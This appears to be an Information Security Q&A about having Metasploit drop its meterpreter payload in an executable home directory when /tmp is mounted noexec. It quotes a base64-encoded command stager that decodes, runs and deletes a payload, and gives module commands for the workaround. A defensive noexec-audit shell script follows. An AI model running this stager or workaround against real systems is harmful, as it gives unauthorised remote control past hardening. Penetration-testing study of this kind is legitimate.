How to set where the meterpreter payload is placed on the victim machine in metasploit?

Information Security Asked by h f on February 5, 2021

Background

I am trying to achieve a meterpreter session on a test machine (the "victim") that I already have a shell session on. When I run the command sessions -u #, where # corresponds to the number of the shell session, I receive an error because metasploit tries to create and execute a payload on the victim in the /tmp directory, which is set to be non-executable. In other words, nothing can be executed from the /tmp directory on the victim machine.

Question

Is there a way for me to specify where this executable file is created and executed on the victim machine?

  • My goal is to achieve something like this:
    • Use the linux/x86/meterpreter/bind_tcp payload.
    • Instead of having the executable payload be placed in /tmp and called something random such as abc123, I would want to have the payload placed in a known location that allows execution such as /home/Bob.
    • The executable payload whose location we specified, /home/Bob/abc123, will then execute and start the meterpreter session.

Notes

  • I believe this has something to do with modifying the "command stager". In the following link you can see this line:
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+QAAAAAAAAB6AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UmoKQVlWUGopWJlqAl9qAV4PBUiFwHg7SJdIuQIAEVysHIABUUiJ5moQWmoqWA8FWUiFwHklSf/JdBhXaiNYagBqBUiJ50gx9g8FWVlfSIXAecdqPFhqAV8PBV5aDwVIhcB47//m>>'/tmp/FgFBP.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/tDGmH' < '/tmp/FgFBP.b64' ; chmod +x '/tmp/tDGmH' ; '/tmp/tDGmH' ; rm -f '/tmp/tDGmH' ; rm -f '/tmp/FgFBP.b64'"]

One Answer

The sessions -u is actually a post/multi/manage/shell_to_meterpreter with predefined options. If you see the advanced options for that module (with show advanced), you should notice it has:

Name               Required   Description
----               --------   -----------
BOURNE_FILE        no         Remote filename to use for dropped binary
BOURNE_PATH        no         Remote path to drop binary
PAYLOAD_OVERRIDE   no         Define the payload to use

Therefore, what you are trying to do should be possible with:

use post/multi/manage/shell_to_meterpreter
set SESSION 2
set BOURNE_PATH /home/Bob
set PAYLOAD_OVERRIDE linux/x86/meterpreter/bind_tcp
run

Answered by Esa Jokinen on February 5, 2021
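The workaround above only succeeds because /home is not mounted noexec. As an added example (not from the question or the answer), this POSIX shell snippet reads /proc/mounts-style lines and reports whether a given path sits on a noexec filesystem, so an administrator can check that the noexec hardening that blocked the stager in /tmp also covers the other world-writable or user-writable directories a dropped binary could land in. The SAMPLE_MOUNTS text is constructed; pass no second argument to read the live /proc/mounts.

```shell
#!/bin/sh
# Constructed sample in /proc/mounts format (device, mount point, fstype, options, ...).
SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda2 /home ext4 rw,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime 0 0'

# mount_opts_for PATH [MOUNTS_TEXT]
# Prints "<mount point> <options>" for the mount whose point is the longest
# prefix of PATH (so /tmpfoo is not matched by /tmp). Reads /proc/mounts when
# MOUNTS_TEXT is omitted.
mount_opts_for() {
  mounts=${2:-$(cat /proc/mounts)}
  printf '%s\n' "$mounts" | awk -v p="$1" '
    {
      mp = $2
      if (mp == "/" || p == mp || index(p, mp "/") == 1) {
        if (length(mp) > length(best)) { best = mp; opts = $4 }
      }
    }
    END { if (best != "") print best " " opts }'
}

# is_noexec PATH [MOUNTS_TEXT]
# Returns 0 when the filesystem holding PATH carries the noexec option.
is_noexec() {
  line=$(mount_opts_for "$1" "$2")
  opts=${line#* }
  case ",$opts," in
    *,noexec,*) return 0 ;;
  esac
  return 1
}

# report_exec_dirs MOUNTS_TEXT DIR... : one line per directory, for a quick audit.
report_exec_dirs() {
  mounts=$1; shift
  for d in "$@"; do
    if is_noexec "$d" "$mounts"; then
      printf '%s\tnoexec (dropped binary cannot run here)\n' "$d"
    else
      printf '%s\tEXEC ALLOWED (usable as a drop path)\n' "$d"
    fi
  done
}

# Stand-alone run over the constructed sample: /tmp and /dev/shm are noexec, /home is not.
report_exec_dirs "$SAMPLE_MOUNTS" /tmp /home/Bob /dev/shm /tmpfoo
```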
